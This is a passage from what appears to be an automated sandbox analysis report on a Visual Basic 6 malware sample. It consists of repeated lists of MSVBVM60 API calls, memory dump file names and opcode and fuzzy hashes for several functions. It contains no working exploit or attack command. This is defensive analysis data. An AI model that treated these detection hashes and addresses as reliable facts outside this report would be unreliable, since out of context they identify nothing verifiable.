                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                    • Instruction ID: 6a6c65185a8990ed76a7925615099f76a1e8909006d367d433fa78fd926de25a
                                                                                    • Opcode Fuzzy Hash: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                    • Instruction Fuzzy Hash: 70318071A00158DFCB14DBE4ED84DEE7B79EF88300B10456AE505E3261DA345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004174FF Relevance: 27.1, APIs: 18, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                    • Instruction ID: 866caa4c8eac6f19f1194a02b11e2fb1ed896fcf014f3bed80b5db7ea06780d3
                                                                                    • Opcode Fuzzy Hash: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                    • Instruction Fuzzy Hash: A53160B1A00158DFCB14DBA4ED94DEE7B79EF88300F10856AE506A3261DB345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00417487 Relevance: 27.1, APIs: 18, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                    • Instruction ID: b6ea956760585b48cef5c944cb0b6b88b320cc0c6bf33020a7601fb965c6dcd1
                                                                                    • Opcode Fuzzy Hash: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                    • Instruction Fuzzy Hash: B33172B1A00118DFCB14DFA4ED84DEE7779EF88300F10456AE506E3261DB345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004174A5 Relevance: 27.1, APIs: 18, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
                                                                                    • Instruction ID: 4ac9cb3760513d78d10cab075c76733cbf34af43b16f8391a80bd0b5696eddcc
                                                                                    • Opcode Fuzzy Hash: 02c7f454d40560d9c6661f647330d47c8efe8f1cef0e828d259a4e05a1306448
                                                                                    • Instruction Fuzzy Hash: 57316071A00159DFCB14DFA4ED84DEEBB79EF88300F50456AE506A3261DB346986CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041751D Relevance: 27.1, APIs: 18, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
                                                                                    • Instruction ID: 685c137c93b8fd798157623ef34c738d9d6605c7449a0796629f3e9ff1c3c11f
                                                                                    • Opcode Fuzzy Hash: 94c476b80a82efe6d398e93fd76fd4f9bee1e122c1bd37c77481171981cade68
                                                                                    • Instruction Fuzzy Hash: 383160B1A00158DFCB14DBA4ED84DEEB779FF88300B10456AE506E3261DB345986CFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041753B Relevance: 27.1, APIs: 18, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
                                                                                    • Instruction ID: abceff13d7d3de1d96dc032862a960644500f493d2a40e7a9fa547c81a193ae3
                                                                                    • Opcode Fuzzy Hash: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
                                                                                    • Instruction Fuzzy Hash: 463160B1A00118DFCB14DFA4ED94DEEBB79EF88300B10456AE506E3261DB745986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00417139 Relevance: 27.1, APIs: 18, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
